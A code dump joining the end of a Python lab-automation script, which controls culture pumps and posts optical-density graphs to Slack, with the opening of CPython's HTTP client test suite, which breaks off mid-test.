with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
concmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODConc",
file = file_content
)
pumpa = allpumps[['media','drug','waste']]
PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
pumsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
thrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='threads',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
tempmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
# DIL RATE GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allpumps[['dil_rate']].plot(ax = DM, label='threads',color='tab:grey',legend=False)
DM.set_ylabel(ylabel='Dilution Rate (Hz)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); allODs = None; allpumps = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
dilrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODDilR",
file = file_content
)
if self.firstrec:
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
self.firstrec = False
else:
delmsg = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recmes['ts']
)
delod = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
delodc = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
delrec = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
delthr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
deltmp = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
deldilr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.redilr['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
self.thread_locks['graphs'].release()
def dynLimit(self):
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
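# Sketch of the derivative chain above with toy numbers (not the real data):
#
#   import numpy as np
#   t  = np.array([0.0, 0.1, 0.2, 0.3])        # hours
#   od = np.array([0.05, 0.09, 0.12, 0.13])    # smoothed OD readings
#   gr  = np.diff(od) / np.diff(t)             # 1st derivative: growth rate
#   gr2 = np.diff(gr) / np.diff(t[1:])         # 2nd derivative: acceleration
#
# The OD threshold is fixed once growth is still positive (instant_gr above
# OD_err) but no longer accelerating (instant_gr2 near zero), i.e. the culture
# has left exponential phase; OD_min is then pinned to the current average OD.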
def control_alg(self):
try:
print_buffer = 0
self.init_pins(self.pin_list)
if self.selection == 'toprak':
if self.avOD > self.OD_min:
self.pump_waste()
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
elif self.selection == 'constant':
if self.avOD > self.OD_min:
self.pump_waste()
if self.vial_drug_mass/self.culture_vol < self.vial_conc:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
self.dil_rate_calc()
self.last_dilutionOD = self.avOD
except Exception as e:
print('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
self.thread_locks['control_alg'].release()
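# Hypothetical trace of the 'toprak' branch (numbers for illustration only):
# with OD_min = 0.10 and OD_thr = 0.125, a reading of avOD = 0.15 that also
# exceeds the OD at the last dilution pumps waste + drug; avOD = 0.11 pumps
# waste + media; avOD = 0.08 pumps nothing and only posts a status message.
# The 'constant' branch instead doses drug whenever the vial concentration
# (vial_drug_mass / culture_vol) is below the configured vial_conc target.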
def pump_waste(self):
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.vial_drug_mass = self.vial_drug_mass - (self.vial_drug_mass/self.culture_vol)
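# The mass-balance update above implicitly assumes the waste pump removes one
# volume unit (e.g. 1 mL) per actuation: the mass drawn off is the current
# concentration, vial_drug_mass / culture_vol, times that withdrawn volume.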
def pump_drug(self):
print('[%s] OD Threshold exceeded, pumping %s' % (self.sysstr,self.drug_name))
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.pump_act_times.append(self.P_drug_times)
self.vial_drug_mass = self.vial_drug_mass + self.drug_conc * self.P_drug_times * self.drug_pump_flo_rate
drugamsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping %s. Drug concentration: %f ug/mL" % (self.avOD, self.drug_name, (self.vial_drug_mass)/self.culture_vol)
)
def pump_media(self):
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
self.pump_act_times.append(self.P_nut_times)
thramsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. %s concentration: %f ug/mL" % (self.avOD, self.drug_name.capitalize(), (self.vial_drug_mass)/self.culture_vol)
)
def no_pump(self):
self.pump_act_times.append(0)
# if self.vial_drug_mass < 0: self.vial_drug_mass = 0
thrbmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
def dil_rate_calc(self):
if len(self.pump_act_times) > 3:
self.pump_act_times.pop(0)
if self.drug == 2:
self.dil_rate = self.drug_pump_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
elif self.nut == 1:
self.dil_rate = self.nut_pump_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
else:
self.dil_rate = 0
# self.dil_rate_smo = self.pump_flo_rate * np.mean(self.pump_act_times)/(self.time_between_pumps * self.culture_vol)
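# Worked example with made-up numbers: a drug pump with flow rate 0.5 mL/s
# run for 2 s, firing at most once every 60 s into a 20 mL culture, gives
# dil_rate = 0.5 * 2 / (60 * 20) ≈ 8.3e-4 culture volumes per second.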
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
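# e.g. secondsToText(93784) -> '1 day, 2 hours, 3 minutes, 4 seconds'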
def on_timer(self):
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02d:%02d:%02d' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
compmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02d:%02d:%02d" % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
self.threads['threads'] = threading.Thread(target=self.thread_split)
self.threads['threads'].start()
else:
self.threads['threads'] = threading.Thread(target=self.thread_split)
self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# Count loops to see whether a thread stays locked for a long time
global i2c_q
global graph_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())), self.active_threads, self.avOD))
self.thread_locks['threads'].release()
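# Scheduling pattern used above: each task type (adc, control_alg, graphs)
# acquires its lock *before* its job is queued on i2c_q/graph_q, and the
# worker (get_OD, control_alg, graphOD) releases it on completion, so at most
# one instance of each task is in flight per vial and slow jobs are skipped
# rather than piling up behind one another.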
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = graph_controller).start()
if config['MAIN'].getboolean('temp_sensor'): threading.Thread(target = temp_sensor_func).start()
eve_starter()
threading.Thread(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
# ===========================================================================
# test_httplib.py
# ===========================================================================
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
TestCase = unittest.TestCase
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import warnings_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
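# These pieces compose into complete responses throughout the tests, e.g.
# FakeSocket(chunked_start + last_chunk + trailers + chunked_end), which a
# correct parser decodes to chunked_expected by joining the size-prefixed
# chunks and discarding the trailers.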
HOST = socket_helper.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close  # nerf close()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
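# Typical use below: preload the fake with a canned response, attach it to a
# connection, then inspect the bytes the client "sent", e.g.:
#
#   conn = client.HTTPConnection('example.com')
#   conn.sock = FakeSocket('HTTP/1.1 200 OK\r\n\r\nbody')
#   conn.request('GET', '/')    # the request bytes land in conn.sock.data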
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
